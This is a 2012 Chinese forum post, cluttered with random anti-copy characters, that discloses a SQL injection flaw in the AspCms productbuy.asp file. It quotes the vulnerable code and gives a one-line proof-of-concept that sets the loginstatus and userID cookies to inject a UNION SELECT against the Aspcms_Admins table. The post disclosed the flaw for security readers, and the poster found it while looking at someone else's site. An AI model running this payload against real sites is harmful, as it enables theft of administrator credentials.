好久没上土司了,上来一看发现在删号名单内.....
2 Y6 q& o8 w. R5 S5 }6 {也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。- w* N. s9 v+ N V
废话不多说,看代码:
% Y: u( s. S) j5 {6 y9 b6 R& l; m# s
<%( A. E: A! v; S: l0 {" s+ l$ @* V
, e2 r. F& l7 m' o# Y+ m) V3 {2 pif action = "buy" then# p, A ^: q" N$ s/ o: X3 H
. x9 I% v2 a s8 s, C0 l addOrder()
6 @0 v/ J8 n# G0 S; r0 o9 P3 G" R9 H8 x) X
else
9 s7 U- ]* q, s
/ Q% U, d% @8 o S+ | echoContent()
. v% [- i5 O4 t+ I3 w
2 |- l8 _, D/ y/ G4 Gend if7 m; v$ N7 S! K3 i6 l
7 ~7 d# U5 y: H* b/ c; p
# \: A" r5 K: d" Z3 ]6 w" v% u2 ]3 E# \& D* I6 z4 ~" n
……略过. A% s3 O* Y3 j# G1 u
& i4 `$ r% ^( m! W4 x, j; [0 u0 b/ [- r2 E
1 O1 d3 ~* n+ ^$ N: `
Sub echoContent()' g% k+ Q$ ~- |
" V0 r* _9 N: B; Q( B8 D8 q
dim id$ z" i4 H' r0 n/ E: R- G1 n9 W" H, O+ A
5 c+ P- t v5 G, b1 q, ^& C
id=getForm("id","get")8 s5 r( W# @) Z; C5 t
/ S0 \ [* }9 A2 Y : f' F' W+ P1 E4 s5 c/ y
# w: D" W* X' N if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" + x% d6 U$ R1 |) F. R& p* B- L
) s- @4 _9 f. K; g' b A
) V [2 r6 y: f# `" T( W# e7 j; E1 G
7 q4 X/ M7 o) a/ q" P dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
( ^5 Q3 G2 n; i9 V! N2 I5 x+ `, o; ^/ _
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct; V. \6 n: M, d
3 J, k; _ R" o: f" Y Dim templatePath,tempStr! b b8 ~# {5 S. Y1 I- l& g2 C
( [2 W; M4 ~& d templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
. B% z. ^; ]8 v( V. J5 x( f0 p- w0 V3 {- M5 {) o
) h! i1 J1 L; J9 @; d& j! X
8 B# T' d- g1 @, U7 M: l set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1"); j8 F& B3 q5 w( F6 p/ j3 D% L4 N
# ?5 R' r# L8 Y4 y; @4 ^* b5 a
selectproduct=rsObj(0)
$ H" _9 K& f+ `4 d8 X* Q
- X% N5 C7 a, V) a' x: | / F8 r5 Q" m5 l6 b: f! z
/ w- Q1 M: i8 Y0 a+ _8 L
Dim linkman,gender,phone,mobile,email,qq,address,postcode% n% ~2 W8 W$ M0 ~- R6 X6 z/ ]
% B- R2 Y! E: i4 j7 P' N& h
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",09 K3 i- L8 x: X# B
: j( Y" g' C. U- w8 h Z0 T" e
if rCookie("loginstatus")=1 then
1 A) D3 n8 u) n6 c% g/ P' O* ?( S( C3 c7 R( Z
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")3 `7 I, ?) q/ y f) `5 n
% r$ V4 j* j4 C* k- Z: d
linkman=rsObj("truename")' Y4 W" e- \' q( k
. v/ I s' j; m+ @# l9 b
gender=rsObj("gender") P+ f8 V* m" e" ~5 t$ w
6 a6 B! U! j% l. S
phone=rsObj("phone")! a3 g. L$ p1 ~! m8 g, u
, g( c8 Y4 O# E+ Q3 g: v: | mobile=rsObj("mobile")
# Q7 E% @0 K; W9 }* O( d7 b0 Y' z, u0 i% x! @8 e9 M. h+ I
email=rsObj("email")
$ E. E/ B& ~8 ^3 J
5 x( r; D1 ^$ b6 {3 Y qq=rsObj("qq")
8 B. q! S" O) _- y# P& {2 i) W$ H& ?3 z
address=rsObj("address")1 r" V3 {- `/ y' k% H. _
& ~+ Q% `$ S' T$ Y7 K postcode=rsObj("postcode")- a2 K5 Y. F" n- B! s
( L) z8 x( H- w
else : [' Q' h2 ~/ q
8 g# D/ c0 `4 Y* t3 J+ ]( _! X6 u
gender=1
7 V. {9 h _$ K6 z+ @6 z7 v. J
. C! N9 M6 @2 E end if
0 G. ~( x7 A9 B
1 x8 \, U" K' o- K& N rsObj.close()+ t! Q' x/ E$ G# T# S3 b, c# B
& |+ ~$ i( |/ T3 N: _1 A
+ J1 E" ]8 W% ` y. l+ \* o8 q$ ^. _9 P) }8 c: E5 c
with templateObj
$ B$ V4 U/ {$ r& u7 g! _
) Q9 N! y# F% q& b/ X; M .content=loadFile(templatePath) - I" ~/ X. L [( W! h
8 z6 _7 b# n: ?, D: w7 g" @# w3 d
.parseHtml()
7 X* Q/ \3 k0 B# B$ }& `
* O% E; V$ A; M. w' f .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
' H! b t/ o: [. S+ z- h" W& N( ^ r, v# C7 x" L J# C% ?
.content=replaceStr(.content,"[aspcms:linkman]",linkman) - e) R+ i6 d7 p3 u3 w1 {& [& y8 S
0 T2 q9 h i) p- @1 Y6 ~# ?
.content=replaceStr(.content,"[aspcms:gender]",gender)
) q* Z2 f$ Q! \$ X; m+ y5 G
& s& X& `. o7 w9 Y .content=replaceStr(.content,"[aspcms:phone]",phone)
7 w& N% X9 u$ z; @! [- x/ L8 g% J1 n) D: q# U
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 4 U8 T0 y% n* K- ?9 b) X0 l
) S) v m& H8 r3 t5 `) Z
.content=replaceStr(.content,"[aspcms:email]",email)
. i1 @7 q# ^% Z$ P
, W. D9 j5 i+ g/ i .content=replaceStr(.content,"[aspcms:qq]",qq)
. Y0 v. h& ~. ]) ]5 z" ]( y: _6 w
g# j, T) c( W( A .content=replaceStr(.content,"[aspcms:address]",address)
6 H0 D# x# f, c! V/ c& ?. ]( N, K4 B7 Z1 s! _9 E3 b, @, ^
.content=replaceStr(.content,"[aspcms:postcode]",postcode) / Q( Q8 H3 e$ h) D. H6 S7 V0 k
# g% |+ F& P3 G) f- N2 X$ T9 D0 Q .parseCommon() / g! W9 v! v1 |% R! Q; k
5 H3 {4 s1 L# R" S$ P0 u echo .content
3 Z. Z3 M/ K8 n; r& T% p+ Y6 y7 `$ ]4 R3 A" G
end with
8 X; Z& z9 j4 ?8 b
% V. E" [2 r$ F! g set templateobj =nothing : terminateAllObjects) u2 i8 `8 C' ]+ M; K- ?' Y
+ h. f1 k) Z5 G9 H. W" H; v; L+ HEnd Sub
' [1 z& @: S! X8 O2 W! p1 s/ b3 t$ u漏洞很明显,没啥好说的
8 m+ P+ N! A! u2 ]poc:
+ N9 O9 }. C c$ g1 I6 [4 u, S5 J! n, K' C0 h* _; T4 `
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子; g- Q f# d( r* x) i
* B5 ^3 x( J1 u, T5 o+ m& M |
发表于 2012-12-27 08:35:05
收藏
支持
反对